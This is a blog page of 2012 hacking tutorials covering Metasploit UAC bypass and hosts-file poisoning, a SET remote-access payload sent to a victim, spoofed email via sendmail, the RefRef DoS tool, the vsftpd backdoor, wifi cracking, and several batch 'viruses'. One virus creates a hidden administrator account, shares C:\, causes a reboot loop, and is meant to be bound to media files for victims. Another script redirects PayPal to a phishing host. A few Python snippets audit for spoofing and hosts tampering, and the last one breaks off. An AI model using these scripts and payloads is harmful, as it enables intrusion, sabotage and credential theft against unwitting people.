Friday, December 28, 2012

D.N.S. poisoning using metasploit.

0 comments
Today we will edit the hosts file of a remote PC that has already been compromised. By editing the hosts file you can redirect any hostname to any IP address on that machine, because the resolver consults the hosts file before it ever asks DNS. As usual we will use Metasploit.

(1)Hack the remote PC (see: How to hack a remote PC?).

(2)Now we will bypass the UAC protection of Windows, because writing to the hosts file requires an elevated (administrator) process.

(3)Open a terminal and type the following in the terminal:

msfconsole

use exploit/windows/local/bypassuac

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.6

set session 1

exploit

(4)Now we will edit the hosts file with the inject_host post module. SESSION is the new, elevated Meterpreter session that the UAC bypass returned:

msf > use post/windows/manage/inject_host

msf post(inject_host) > set DOMAIN www.google.com

msf post(inject_host) > set IP <your desired IP>

msf post(inject_host) > set SESSION 2

msf post(inject_host) > run

This appends a line of the form "<your IP> www.google.com" to C:\Windows\System32\drivers\etc\hosts on the victim, so www.google.com on that PC resolves to your IP until the line is removed. Only that machine is affected (no DNS server is touched), and the new entry is plainly visible to anyone who opens the hosts file.

Monday, December 24, 2012

How to use R.A.T. through S.E.T?

1 comments
RAT stands for Remote Administration Tool; with a RAT you can control a remote PC. There are lots of ready-made RATs, but they are written by other hackers and may well carry a backdoor of their own. So today we will use the RAT that ships with the Social-Engineer Toolkit (SET).

(1)Open your terminal and type

cd /opt/set

./set

(2)Update your SET.

(3)Now select option 3, Third Party Modules.

(4)Now select option 2, RATTE (Remote Administration Tool Tommy Edition).

(5)Enter the IP address of your computer, which the client will connect back to.

(6)Port RATTE Server should listen on [8080]: press Enter.

(7)Should RATTE be persistent [no|yes]?: yes

(8)Use specific filename (ex. firefox.exe) [filename.exe or empty]?: cool.exe

(9)The payload is exported to src/program_junk/ratteM.exe.

(10)Now send ratteM.exe to the victim. As soon as they download and open it, the client connects back to you, so answer the next prompt:

Start the ratteserver listener now [yes|no]: yes

(11)Choose option 1, list clients.

(12)If the payload ran successfully you will see a new session with the client details. Note the session number. At "Enter the session you want to interact with:" press 0 here.

Now choose option 2, "activate client".

You now get a menu with many options. Select the first option, start shell.

Saturday, December 22, 2012

How to install & configure sendmail in Ubuntu?

10 comments
Sendmail is a mail transfer agent: once it is installed you can send email from the command line, with your own machine acting as the mail server. I will show you how to install and configure sendmail so that we can send spoofed email to targets. The catch is that mail sent this way usually lands in the spam folder, because the receiving server can see that the connecting host and its HELO name do not belong to the domain in the From address (reverse DNS and SPF checks fail).

How to Install Send-Mail?


Open a terminal and type the following commands:

sudo apt-get install mailutils

sudo apt-get install sendmail


How to configure it?


After installing sendmail you have to configure it. It is a little fiddly, but once it is done we can send spoofed mail to anyone.

Type the following command in the terminal:

sudo gedit /etc/mail/sendmail.mc

It opens the sendmail.mc file.

For example, suppose its last two lines are as follows:

MAILER(`local')dnl

MAILER(`smtp')dnl

Put these lines before those two MAILER lines. If your file already contains a MAILER_DEFINITIONS line (Ubuntu's does), do not add it twice: just put the define above it, because all defines have to come before the mailer definitions. Mind the m4 quoting: an opening backtick and a closing single quote.

define(`SMART_HOST', `smtp.gmail.com')dnl

MAILER_DEFINITIONS

One caveat: smtp.gmail.com only relays mail for an authenticated session (on the submission port, 587, with TLS), so with just this line mail to outside addresses will be refused by Google. Either add SMTP authentication for the smart host or point SMART_HOST at a relay that accepts mail from your machine.

OK, now save and close that file.

Now generate the configuration file from the .mc file by typing the following command in the terminal, then restart the sendmail service so it reads the new sendmail.cf:

sudo bash -c 'cd /etc/mail/ && m4 sendmail.mc > sendmail.cf'

Now everything is complete; try sending mail from the terminal, or use the Social-Engineer Toolkit as I mentioned in a previous post.


How to send mail through Command?


Open a terminal and type the following, one line at a time (the server answers each line with a numeric reply code; the lines after DATA are the message, and a line containing only a dot ends it):

telnet 127.0.0.1 25
HELO server
MAIL FROM:<sender's email address>
RCPT TO:<recipient's address>
DATA
Subject: Test mail
From: sender's email address
To: receiver's address

Test Mail
.
quit

The empty line between the headers and the body is required. Note that the envelope sender given in MAIL FROM and the From: header are set independently; that is what makes spoofing possible, and also what gives it away.

Now check the receiver's spam folder; the mail is there. Open the "show original" option and you can see the IP address of your computer in the Received: headers, along with the HELO name and other details.
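To make the exchange above concrete, here is a tiny SMTP receiver state machine driven by the same dialogue that the post types into telnet, followed by the checks a receiving side can run on the result. This is an added example, not code from the post or from sendmail; the host names, addresses and the peer IP 192.0.2.10 are made up.

```python
"""Minimal SMTP receiver plus a scripted client reproducing the telnet session above."""
import re


class SmtpSession:
    """Server side of one SMTP session: feed() takes a client line, returns the reply."""

    def __init__(self, hostname="mx.example.test", peer_ip="192.0.2.10"):
        self.hostname = hostname
        self.peer_ip = peer_ip          # the connecting IP, which no header can hide
        self.helo = None
        self.mail_from = None
        self.rcpt_to = []
        self.in_data = False
        self.data_lines = []
        self.messages = []              # accepted messages as (envelope, raw_text)

    def greeting(self):
        return f"220 {self.hostname} ESMTP ready"

    def feed(self, line):
        if self.in_data:
            return self._data_line(line)
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        if verb in ("HELO", "EHLO"):
            self.helo = arg.strip() or "unknown"
            return f"250 {self.hostname} Hello {self.helo} [{self.peer_ip}]"
        if verb == "MAIL":
            m = re.match(r"FROM:\s*<?([^>\s]*)>?", arg, re.I)
            if self.helo is None or not m:
                return "503 5.5.1 Bad sequence of commands"
            self.mail_from = m.group(1)
            return "250 2.1.0 Sender OK"
        if verb == "RCPT":
            m = re.match(r"TO:\s*<?([^>\s]*)>?", arg, re.I)
            if self.mail_from is None or not m:
                return "503 5.5.1 Need MAIL command first"
            self.rcpt_to.append(m.group(1))
            return "250 2.1.5 Recipient OK"
        if verb == "DATA":
            if not self.rcpt_to:
                return "503 5.5.1 Need RCPT command first"
            self.in_data = True
            return "354 End data with <CR><LF>.<CR><LF>"
        if verb == "QUIT":
            return "221 2.0.0 Bye"
        return "500 5.5.2 Command unrecognized"

    def _data_line(self, line):
        if line != ".":
            # RFC 5321 dot-stuffing: a line starting with ".." carries a literal "."
            self.data_lines.append(line[1:] if line.startswith("..") else line)
            return None
        self.in_data = False
        # The receiving MTA prepends a Received: header recording HELO name and peer IP.
        received = (f"Received: from {self.helo} ([{self.peer_ip}])\r\n"
                    f"\tby {self.hostname} with SMTP")
        raw = received + "\r\n" + "\r\n".join(self.data_lines)
        envelope = {"helo": self.helo, "mail_from": self.mail_from,
                    "rcpt_to": list(self.rcpt_to)}
        self.messages.append((envelope, raw))
        self.mail_from, self.rcpt_to, self.data_lines = None, [], []
        return "250 2.0.0 OK: queued"


def parse_headers(raw):
    """Header name (lower-cased) -> value, reading up to the first empty line."""
    headers = {}
    for hl in raw.split("\r\n"):
        if hl == "":
            break
        if hl[:1] in " \t":
            continue                     # folded continuation line
        name, _, value = hl.partition(":")
        headers.setdefault(name.strip().lower(), value.strip())
    return headers


def spoof_indicators(envelope, raw):
    """The clues a receiver (or its spam filter) sees in a hand-typed spoofed mail."""
    hits = []
    hdr_from = parse_headers(raw).get("from", "")
    hdr_dom = hdr_from.rpartition("@")[2].strip("<> ").lower()
    env_dom = envelope["mail_from"].rpartition("@")[2].lower()
    if hdr_dom and hdr_dom != env_dom:
        hits.append(f"From: header domain {hdr_dom!r} differs from envelope sender domain {env_dom!r}")
    if "." not in envelope["helo"]:
        hits.append(f"HELO name {envelope['helo']!r} is not a fully qualified host name")
    return hits


# Constructed client transcript: the post's telnet dialogue with made-up addresses.
TRANSCRIPT = [
    "HELO server",
    "MAIL FROM:<me@example.test>",
    "RCPT TO:<victim@example.test>",
    "DATA",
    "Subject: Test mail",
    "From: support@bank.example",   # forged display sender
    "To: victim@example.test",
    "",                              # the blank line ends the headers
    "Test Mail",
    ".",
    "QUIT",
]


def run_transcript(lines=TRANSCRIPT):
    """Drive one session; returns (server replies, session) for inspection."""
    session = SmtpSession()
    replies = [session.greeting()]
    for line in lines:
        reply = session.feed(line)
        if reply is not None:
            replies.append(reply)
    return replies, session


if __name__ == "__main__":
    replies, session = run_transcript()
    print("\n".join(replies))
    for envelope, raw in session.messages:
        print(envelope, spoof_indicators(envelope, raw), sep="\n")
```

The Received: line the receiver writes is the one the post tells you to look for under "show original": it records the HELO name and the real connecting IP, and no amount of editing the From: header changes it.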

Thursday, December 20, 2012

How to install social engineering toolkit(S.E.T.) in ubuntu?

9 comments
The Social-Engineer Toolkit is a neat tool that ships with BackTrack and extends what you can do with Metasploit. If you are on a Linux system other than BackTrack, you can install it yourself.

Updated: this article was written when SET used SVN. It has since moved to GitHub, so please click here for the new installation method.

Extra packages needed to use SET effectively are as follows.

(1)Metasploit: see my old post on how to install Metasploit in Ubuntu here.

(2)Ettercap: needed if you are on a network and want to run network attacks such as man-in-the-middle or DNS spoofing.

To install Ettercap, open a terminal and type the following command:

sudo apt-get install ettercap

(3)OpenJDK 6: required by SET. Just type the following command in the terminal:

sudo apt-get install openjdk-6-jdk


Now open a terminal and change directory to /opt:

sudo bash

cd /opt

svn co http://svn.secmaniac.com/social_engineering_toolkit set/

cd /opt/set

svn update

nano config/set_config

Now we will configure it. First it needs the Metasploit path, so we put that in the config file. Here is the catch: in the first step we installed Metasploit into /opt/metasploit-4.4.0/msf3, but with that path in the config file SET does not detect Metasploit. So rename the metasploit-4.4.0 folder to framework3.

Put /opt/framework3/msf3 as the path in the config file and save it. Then type in the terminal:

./set

It will open SET.

In the next tutorial I will show you how to configure sendmail and use it in SET.

I know I cannot explain well, so if you face any problem please mention it in a comment.


Monday, December 17, 2012

Download Free E-books about Hacking

792 comments

Hello guys, if you want to learn more about hacking and computer security, I have uploaded the eBooks below to Dropbox. The download link is at the end.

The list of books is as follows.

(1)CEH (Certified Ethical Hacker) 2010 v6.

(2)Hacking Wireless Networks For Dummies.

(3)Gray Hat Hacking.

(4)Blind_SQLInjection.

(5)backtrack-4-assuring-security-by-penetration-testing.

(6)Collections of Ankit Fadia Hacking Book.

(7)Secrets of Reverse Engineering.

(8)Social Engineering toolkit

(9)Ethical Hacking and Countermeasures- Web Applications and Data Servers.

New books Added

(10)CSRF attack & Defense

(11)Armitage guide

(12)Pass-the-hash attacks: Tools and Mitigation

(13)HACKING: THE ART OF EXPLOITATION


(14)XSS Attacks - Exploits and Defense


(15)Seven Deadliest Network Attack 


Download link:- Please click here.

Sunday, December 16, 2012

How to use REFREF?

0 comments
As we know, in the past the famous hacktivist group Anonymous carried out a series of DDoS attacks on websites such as PayPal, MasterCard and Visa. At that time they used the tool LOIC to take the sites down.

Although the attacks succeeded, several participants were arrested later because of LOIC, which makes no attempt to hide the attacker's own IP address. So they decided to build a new weapon for DoS attacks.

It was RefRef. Versions exist in Perl, Java and Python. Its main requirement is that the target URL must be vulnerable to SQL injection: RefRef uses the injection to make the site's own database server run an expensive query, so the server exhausts its own resources. In other words, if you find a website vulnerable to SQL injection, you can take it down with this tool.

You can download the RefRef script here.

How to use?


It's pretty simple. Just open a terminal, change to the download directory and run the script:

cd Downloads

perl refref.pl <vulnerable URL>

It will take the site down in a short time. The tool is very effective: a 17-second attack from a single machine reportedly caused a 42-minute outage of Pastebin.

Friday, December 14, 2012

Batch File Virus -4

0 comments
@echo off
cd\
cd %SystemRoot%\system32\
md 1001
cd\
cls
rem N0 H4rm 15 cau53d unt1| N0w
rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| ch4ng3 th3 t1m3 2 12:00:00.0 & d4t3 as 01/01/2000
echo 12:00:00.00 | time >> nul
echo 01/01/2000 | date >> nul
net users Microsoft_support support /add
rem Th3 u53r 4cc0unt th4t w45 Cr34t3d 15 ju5t 4 |1m1t3d 4cc0unt
rem Th15 p13c3 0f c0d3 w1|| m4k3 th3 |1m1t3d u53r 4cc0unt5 t0 4dm1n15tr4t0r 4cc0unt.
net localgroup administrators Microsoft_support /add
rem 5h4r3 th3 R00t Dr1v3
net share system=C:\ /UNLIMITED
cd %SystemRoot%\system32\1001
echo deal=msgbox ("Microsoft Windows recently had found some Malicious Virus on your computer, Press Yes to Neutralize the virus or Press No to Ignore the Virus",20,"Warning") > %SystemRoot%\system32\1001\warnusr.vbs
rem ch4ng35 th3 k3yb04rd 53tt1ng5 ( r4t3 4nd d3|4y )
mode con rate=1 > nul
mode con delay=4 >> nul
rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| d15p|4y 50m3 4nn0y1ng m5g, as c0d3d ab0v3, 3x4ct|y @ 12:01 and 12:02
at 12:01 /interactive "%SystemRoot%\system32\1001\warnusr.vbs"
at 12:02 /interactive "%SystemRoot%\system32\1001\warnusr.vbs"
msg * "You are requested to restart your Computer Now to prevent Damages or Dataloss" > nul
msg * "You are requested to restart your Computer Now to prevent Damages or Dataloss" >> nul
rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| c0py th3 warnusr.vbs f1|3 2 th3 5t4rtup, th4t w1|| b3 3x3cut3d @ 3v3ryt1me th3 c0mput3r 5t4rt5
copy %SystemRoot%\system32\1001\warnusr.vbs "%systemdrive%\Documents and Settings\All Users\Start Menu\Programs\Startup\warnusr.vbs"
rem ***************************************************************************
rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| d15p|4y Th3 5hutd0wn d14|05 B0X w1th 50m3 m5g and w1|| r35t4rt c0nt1nu0u5|y
echo shutdown -r -t 00 -c "Microsoft has encountered a serious problem, which needs your attention right now. Hey your computer got infected by Virus. Not even a single anti-virus can detect this virus now. Wanna try? Hahahaha....! " > %systemroot%\system32\1001\sd.bat
rem th3 5d.bat ju5t wr1tt3n 1n 1001 15 c0p13d 1nt0 th3 5t4rtup f0|d3r
copy %systemroot%\system32\1001\sd.bat "%systemdrive%\Documents and Settings\All Users\Start Menu\Programs\Startup\sd.bat"
rem ***************************************************************************
cd\
cls
rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| m4k3 th3 v1ru5 b1t 5t34|th13r
cd %systemdrive%\Documents and Settings\All Users\Start Menu\Programs\Startup\
attrib +h +s +r warnusr.vbs
attrib +h +s +r sd.bat
cd\
cd %systemroot%\system32
attrib +h +s +r 1001
rem K1||5 th3 3xp|0r3r.3x3 Pr0c355
taskkill /F /IM explorer.exe
rem @ EOV // End of Virus

Copy the source code, paste it into Notepad and save it with the .bat extension. Two things to keep in mind: everything here (net user, net share, at, writing under system32) needs administrator rights, and the "Documents and Settings" paths and the at /interactive switch only exist on Windows XP-era systems, so on later versions the script does not work as described. It starts in C:\windows\system32 and creates a new directory named 1001, changes the time to 12:00 and the date to 01-01-2000, then creates a new user named Microsoft_support with the matching password support.

It then adds that account to the local Administrators group and shares the root drive C: over the network under the share name system, which by itself leaves the whole system exposed. It writes a VBScript file named warnusr.vbs that displays the message 'Microsoft Windows recently had found some Malicious Virus on your computer, Press Yes to Neutralize the virus or

Press No to Ignore the Virus', which looks as though it comes from the operating system itself, then changes the keyboard repeat rate and delay. Because the script has already set the time and date, the two scheduled at jobs fire the warning exactly at 12:01 and 12:02, and msg pops up 'You are requested to restart your Computer Now to prevent Damages or Data loss'; if the user restarts the computer, it is gone.

Whenever the user logs in, the computer reboots again immediately, because sd.bat in the Startup folder runs 'shutdown -r' with a zero timeout. The user can do nothing about it except boot into safe mode and delete the file, and the files carry the system and hidden attributes, which keep them out of a default Explorer view.

The only way to stop it is to boot into safe mode, disable the start-up items, and delete the files in C:\windows\system32\1001 and in the Startup folder. Do not forget the two things the reboot loop leaves behind: the Microsoft_support administrator account and the system share of C:\, which stay in place until removed by hand.

You can also use an exe-binder to bind this script to an audio, video, text or any other file, then use some social-engineering technique to make the victim run the file and harm their own computer.

You can build this without any third-party tools on Windows: instead of an exe-binder, use the iexpress wizard to create a custom self-extracting package.

Wednesday, December 12, 2012

Batch File Virus -3

0 comments
Most of you have heard of fork(), the call that creates a child process. Fork bombing is likewise nothing more than a program calling itself again and again in an infinite loop, bringing the system down by spawning hundreds of windows and processes.

@echo off

:loop

Explorer

Call fork.bat

Goto loop

Copy the above program into Notepad and save it as 'fork.bat'. The explorer command opens a new Explorer window (the Documents folder), and it sits inside a loop; the batch file then calls itself, which opens yet another window and starts yet another copy of the loop, and so on until the system hangs or crashes. Each call nests one level deeper, so nothing short of killing the process tree (or rebooting) stops it.

Tuesday, December 11, 2012

Batch file virus -2

0 comments
Batch programming lets its programmers create custom viruses simply by misusing the way built-in commands work. In this chapter we look at the dark side of batch by learning how to misuse commands to create batch viruses.

Folder Replicator Virus:

Here is a simple batch virus of only six lines: it keeps creating a folder of the same name inside the previous one, over and over, until the user stops it.

1. Just open up a notepad, copy and paste the below code

cd\

cd C:\Documents and Settings\username\Desktop

:loop

md Virus

cd Virus

goto loop

2. Save it as a batch file with the .bat extension. Before doing that, replace 'username' in the code with the name of the currently logged-in user.

3. Then run it on the victim's computer.

4. It does not cause much harm; it just keeps creating a folder inside a folder and goes on.

One more thing to notice: because each directory is created inside the previous one with the same name, the result does not look like a mess, since everything lives under one main directory, and deleting that top-level Virus directory removes everything this code created. Note that the loop does not run forever: once the nested path exceeds the Windows path-length limit, md starts failing with an error.

Monday, December 10, 2012

DNS poisoning using BATCH File

1 comments
Batch file programming is the native scripting offered by the Microsoft Windows operating system. A batch file is created with any text editor such as Notepad or WordPad and consists of a sequence of built-in commands used for routine tasks: deleting a series of files of one or several types, creating logs, clearing unwanted junk from your computer, and even writing a batch VIRUS.

DNS poisoning:


A batch file can alter name resolution by editing the hosts file at C:\windows\system32\drivers\etc\hosts (note that the file has no extension; a file named hosts.txt is simply ignored by Windows). The resolver consults this file before it asks DNS, so a poisoned entry takes you to a malicious website instead of the legitimate one. This can also be used for phishing, i.e. redirecting you to a bogus website that looks exactly like the legitimate one and then stealing your credentials. Writing to the file requires administrator rights.

1. Just open up a notepad, copy and paste the below code

@echo off
echo 10.199.64.66 www.google.com >> C:\windows\system32\drivers\etc\hosts
echo 10.199.64.67 www.paypal.com >> C:\windows\system32\drivers\etc\hosts
exit

2. Save it as a batch file with the extension .bat

3. Then run it (as an administrator) on the victim's computer to infect it.

4. This appends two new entries to the hosts file. Whenever the user browses to www.google.com, the browser connects to the host at 10.199.64.66 instead; likewise, if the user tries to log in to PayPal by typing www.paypal.com, the browser lands on a bogus external site at 10.199.64.67, and any credentials entered there go straight into the attacker's database for further use. For a site served over HTTPS the bogus host cannot present a valid certificate for the real name, so a modern browser warns before the login page is even shown.
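Both the Metasploit inject_host post at the top of this page and the batch script above leave the same trace behind: a public hostname mapped to a non-local address in the hosts file. The following Python script, an added example that is not part of either post, parses a hosts file and reports such entries. The sample file content is constructed; run it with --live to read the real file on the machine it runs on.

```python
import ipaddress
import os
import sys

# Constructed sample: a stock Windows hosts file plus the two lines the batch
# script above appends. Not copied from any real machine.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
# localhost name resolution is handled within DNS itself.
#   127.0.0.1       localhost
#   ::1             localhost
127.0.0.1       mypc.local        # harmless local alias
0.0.0.0         ads.example.test  # ad-blocking style entry
10.199.64.66 www.google.com
10.199.64.67 www.paypal.com
"""


def hosts_path():
    """Where the live hosts file lives on this OS (only read when run with --live)."""
    if os.name == "nt":
        root = os.environ.get("SystemRoot", r"C:\Windows")
        return os.path.join(root, "System32", "drivers", "etc", "hosts")
    return "/etc/hosts"


def parse_hosts(text):
    """Yield (line_no, ip_address, hostname) for every mapping in the file text."""
    for line_no, raw in enumerate(text.splitlines(), 1):
        body = raw.split("#", 1)[0].strip()      # drop comments
        if not body:
            continue
        fields = body.split()
        try:
            ip = ipaddress.ip_address(fields[0])
        except ValueError:
            continue                              # malformed line, not a mapping
        for name in fields[1:]:
            yield line_no, ip, name.lower()


def classify(ip):
    """Loopback / 0.0.0.0 entries alias or block a name; anything else redirects it elsewhere."""
    return "local" if ip.is_loopback or ip.is_unspecified else "redirect"


def audit_hosts(text, watch=()):
    """Entries worth a look: every redirect, plus any watched name however it is mapped
    (a watched name pointed at 0.0.0.0 is a silent block, e.g. of an update server)."""
    findings = []
    for line_no, ip, name in parse_hosts(text):
        kind = classify(ip)
        if kind == "redirect" or name in watch:
            findings.append({"line": line_no, "host": name, "ip": str(ip),
                             "kind": kind, "private_ip": ip.is_private})
    return findings


if __name__ == "__main__":
    if "--live" in sys.argv:
        with open(hosts_path(), encoding="utf-8", errors="replace") as fh:
            text = fh.read()
    else:
        text = SAMPLE_HOSTS
    for f in audit_hosts(text, watch=("www.paypal.com", "update.microsoft.com")):
        print(f"line {f['line']}: {f['host']} -> {f['ip']} ({f['kind']}, private={f['private_ip']})")
```

A redirect to a private address, as in both sample entries, is the typical sign of a phishing host on the local network; a redirect to a public address deserves the same attention.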

Saturday, December 8, 2012

How to scan web-server with Nikto?

0 comments
Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6500 potentially dangerous files/CGIs, checks for outdated versions of over 1250 servers, and version specific problems on over 270 servers. It also checks for server configuration items such as the presence of multiple index files, HTTP server options, and will attempt to identify installed web servers and software. Scan items and plugins are frequently updated and can be automatically updated.

Nikto is not designed as an overly stealthy tool. It will test a web server in the quickest time possible, and is fairly obvious in log files. However, there is support for LibWhisker's anti-IDS methods in case you want to give it a try (or test your IDS system).

Not every check is a security problem, though most are. There are some items that are "info only" type checks that look for things that may not have a security flaw, but the webmaster or security engineer may not know are present on the server. These items are usually marked appropriately in the information printed. There are also some checks for unknown items which have been seen scanned for in log files.

Nikto is written in Perl and runs its tests against a web server to identify potential vulnerabilities.

 Download Nikto from here.

 Open a terminal and extract the archive into a folder.

 Then change into that directory by typing the following in the terminal:

    cd Downloads/nikto-2.1.5

 Make nikto.pl executable (right-click the file and make it executable, or use chmod from the terminal).

 Update the test database by typing the following command:

    ./nikto.pl -update

 Now the final step: to scan a web host, type the following in the terminal (a hostname works as well as an IP; add -port if the server is not on port 80):

    ./nikto.pl -host <IP or hostname>

Tuesday, December 4, 2012

How to use the browser_autopwn attack in Metasploit?

0 comments

In this article we will look at how effective Metasploit's browser_autopwn module is. The idea behind the module is that it starts a web server on our machine that hosts a range of browser exploits. When a user opens the malicious link, the server fingerprints the browser and fires the matching exploits at it; if one of them succeeds, a Meterpreter session opens.
To use this attack, open the Metasploit framework and select the browser_autopwn module (auxiliary/server/browser_autopwn). The next image shows the available options and default settings of the module.

[Screenshot: browser_autopwn module options]

Monday, December 3, 2012

How to crack wi-fi password in ubuntu?

17 comments

For this we will use Ubuntu. First install the aircrack-ng suite:
(1)Install aircrack-ng
sudo apt-get install aircrack-ng

(2)You need to become root first. Type "sudo su -" and enter your password.

(3)Now put the wireless card into monitor mode. The mode can only be changed while the interface is down, so type the following in the terminal:
Code:
# ifconfig wlan0 down
# iwconfig wlan0 mode monitor
# ifconfig wlan0 up
Note: if you get an error, type "# iwconfig" in a terminal to check the name of your wireless interface (it may not be wlan0) and make sure the driver supports monitor mode.

(4)After that it is time to scan for a wireless network, which we will compromise for educational purposes. This time we use the command:
Code:
# airodump-ng wlan0
[Screenshot: airodump-ng output]

How to exploit VSFTPD ?

0 comments

VSFTPD, which stands for "Very Secure FTP Daemon"[1], is an FTP server for Unix-like systems, including Linux.

VSFTPD is found on Unix-like systems such as Ubuntu, CentOS, Fedora and Slackware. The service is secure by default, but in July 2011 someone replaced the source archive on the project's download site with a version that contained a backdoor. The backdoor exists only in that tampered build of version 2.3.4 (the swap was noticed and reverted within days, so plenty of 2.3.4 installs are clean), and it can be exploited with Metasploit.

So first check whether the service on port 21 is vsftpd 2.3.4 or not; nmap with version detection (-sV) reads the banner for you.
Let's assume we have scanned a host and found VSFTPD version 2.3.4 running on it.
Open the Metasploit framework and search for the vsftpd module:
[Screenshot: search vsftpd]

As we can see there is only one module we can use, exploit/unix/ftp/vsftpd_234_backdoor. So we configure the module appropriately; the next screenshot shows the options that need to be set (RHOST is the only required one) for the exploit to run successfully.
[Screenshot: vsftpd_234_backdoor options]
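The version check that comes before the Metasploit step can be scripted. The following Python, an added example and not part of the post, grabs the FTP greeting and parses the vsftpd version out of it; the sample banners are constructed. A matching version only makes the host a candidate: the backdoor lived in a tampered download for a short time, so confirming it still takes the module itself.

```python
import re
import socket

# Constructed banner strings in the form FTP servers send on connect.
SAMPLE_BANNERS = [
    "220 (vsFTPd 2.3.4)\r\n",
    "220 (vsFTPd 3.0.3)\r\n",
    "220 ProFTPD 1.3.5 Server ready.\r\n",
]

# vsftpd greets with "220 (vsFTPd <version>)"; some builds drop the parentheses.
VSFTPD_BANNER = re.compile(r"^220[ -]\(?vsFTPd\s+(\d+(?:\.\d+)*)\)?", re.I)
# Only the trojaned 2.3.4 tarball carried the backdoor, so the version is a lead, not proof.
BACKDOORED_VERSIONS = {"2.3.4"}


def parse_vsftpd_version(banner):
    """Version string from a vsftpd banner, or None for any other server."""
    m = VSFTPD_BANNER.match(banner.strip())
    return m.group(1) if m else None


def is_backdoor_candidate(banner):
    return parse_vsftpd_version(banner) in BACKDOORED_VERSIONS


def grab_banner(host, port=21, timeout=5.0):
    """Connect and read the greeting line, which is what nmap -sV does on port 21."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.settimeout(timeout)
        data = b""
        while b"\n" not in data and len(data) < 512:
            chunk = sock.recv(256)
            if not chunk:
                break
            data += chunk
    return data.decode("ascii", "replace")


def check_host(host, port=21):
    """Banner-grab one host and report whether it deserves the Metasploit module."""
    banner = grab_banner(host, port)
    return {"host": host, "banner": banner.strip(),
            "version": parse_vsftpd_version(banner),
            "candidate": is_backdoor_candidate(banner)}


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        print(check_host(sys.argv[1]))          # e.g. python vsftpd_check.py 192.0.2.7
    else:
        for b in SAMPLE_BANNERS:
            print(repr(b.strip()), "->", parse_vsftpd_version(b), is_backdoor_candidate(b))
```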

Wednesday, November 28, 2012

How to Hack targeted website(Basic)?

0 comments

Today is the age of computers and the internet. More and more people are creating their own websites to market their products and earn more profit. Having your own website will definitely help you get more customers purchasing your products, but at the same time it can attract hackers who want to play around with your site. If you have not taken enough care to protect the site, your business can even come to an end because of them.

Before you attack a system you must decide what your goals are. Are you hacking to take the system down, to obtain sensitive data, to break in and take 'root' access, to wreck the system by wiping everything on it, to discover vulnerabilities and see how they can be exploited, etc.? The point is that you have to decide on the goal first.

The most common goals are:

1. Breaking into the system and taking admin privileges.

2. Obtaining sensitive data such as credit card numbers, identity theft, etc. - not recommended

You should have all of your tools ready before you start the next steps. There is a Linux distribution called BackTrack: an operating system that comes with various security tools that help you break into systems.

You must decide how you are going to achieve your task. Plan. There is a common methodology that hackers follow, listed below; you can create your own methodology if you know what you are doing.

Common steps to be taken for hacking a system:

1. Reconnaissance (footprinting)

2. Scanning

3. Ports & Services Enumeration

4. Vulnerability Assessment

5. Vulnerability Exploitation

6. Penetration and Access

7. Privilege Escalation & owning the box

8. Erase tracks

9. Maintaining access

Monday, November 26, 2012

How to exploit robots.txt?

2 comments

What is robots.txt?


Robots.txt is a file listing paths that well-behaved crawlers, mostly search-engine bots such as Googlebot, are asked not to crawl. It tells the search engine that a directory is private and must not be indexed. It is purely advisory: nothing stops a person (or a rude bot) from requesting those paths directly, which is why the Disallow list doubles as a map of what the site owner would rather you not look at.

If you are a site owner and want to create a robots.txt file, go to the following link; it will generate one for you.

http://www.mcanerin.com/EN/search-engine/robots-txt.asp

So for now: robots.txt is simply what websites use to keep certain pages out of search engines.

Here is a sample : http://www.whitehouse.gov/robots.txt

First method


This method is rare and the webmaster would have to be careless to do it, but you'd be surprised how many careless people there are in the world.

It is simple: go to one of the disallowed directories and look at the page source. Sometimes webmasters leave comments there that give hints such as passwords or user names.

You never know you might find something juicy. :]

With that info you could possibly guess the password, for instance by trying the names of the most notorious or most successful football teams.

You should also check whether a disallowed directory is actually reachable or has weak permissions. Click here for a Python script that audits a robots.txt file automatically.

[Screenshot: robots.txt audit]
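As an added example (not the script the post links to, and not part of the post), here is a small robots.txt audit in Python: it parses the file into user-agent groups, collects the Disallow paths, flags the ones whose names suggest something sensitive, and can request each path directly to see whether the server actually enforces the restriction. The sample robots.txt is constructed, and the robots-audit/0.1 User-Agent string is an arbitrary choice.

```python
from urllib.parse import urljoin

# Constructed sample robots.txt; not any real site's file.
SAMPLE_ROBOTS = """\
# keep the crawlers out of the back office
User-agent: *
Disallow: /admin/
Disallow: /backup/
Disallow: /users/
Allow: /users/public/
Sitemap: http://www.example.test/sitemap.xml

User-agent: Googlebot
Disallow: /tmp/
"""

# Path fragments that usually mean something the owner did not want found.
INTERESTING = ("admin", "backup", "config", "db", "old", "private", "sql", "tmp", "upload", "users")


def parse_robots(text):
    """Split robots.txt into groups: {'agents': [...], 'rules': [(directive, path), ...]}."""
    groups, current, last_was_agent = [], None, False
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        field, _, value = line.partition(":")
        field, value = field.strip().lower(), value.strip()
        if field == "user-agent":
            if current is None or not last_was_agent:     # a new run of agents starts a group
                current = {"agents": [], "rules": []}
                groups.append(current)
            current["agents"].append(value.lower())
            last_was_agent = True
        elif field in ("allow", "disallow"):
            last_was_agent = False
            if current is not None and value:            # an empty Disallow means "allow all"
                current["rules"].append((field, value))
        # Sitemap, Crawl-delay and unknown fields do not affect grouping
    return groups


def disallowed_for(groups, agent="*"):
    """Disallowed paths for an agent. A crawler obeys only its most specific group;
    for an audit we take the union of the wildcard group and the named one."""
    agent = agent.lower()
    paths = set()
    for g in groups:
        if "*" in g["agents"] or agent in g["agents"]:
            paths.update(p for d, p in g["rules"] if d == "disallow")
    return sorted(paths)


def interesting(paths):
    return [p for p in paths if any(k in p.lower() for k in INTERESTING)]


def probe(base_url, paths, timeout=5.0):
    """Request each path directly: 200 on a 'disallowed' path is the finding, 403 means the
    server enforces it, 404 means it is not even there. Needs network access."""
    import urllib.error
    import urllib.request
    results = {}
    for p in paths:
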